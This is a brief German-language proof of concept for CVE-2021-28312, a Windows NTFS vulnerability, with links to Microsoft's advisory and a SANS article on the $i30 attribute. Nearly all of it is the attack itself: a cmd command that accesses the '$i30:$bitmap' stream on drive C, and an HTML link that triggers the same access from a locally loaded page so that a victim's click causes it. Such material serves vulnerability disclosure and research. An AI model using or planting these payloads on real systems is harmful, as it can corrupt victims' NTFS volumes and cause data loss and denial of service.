
POC und Beschreibung für CVE-2021-28312
POC und Beschreibung für CVE-2021-28312
Link: https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-28312
Aus cmd: folgenden Befehl eingeben cd c:\:$i30:$bitmap
Remote-Ausnutzung: Kann durch Hinzufügen des folgenden Links auf einer lokal geladenen Seite erfolgen
<a href="file:\\c:\:$i30:$bitmap">Click here</a>
Details zum $i30-Attribut: https://www.sans.org/blog/ntfs-i30-index-attributes-evidence-of-deleted-and-overwritten-files/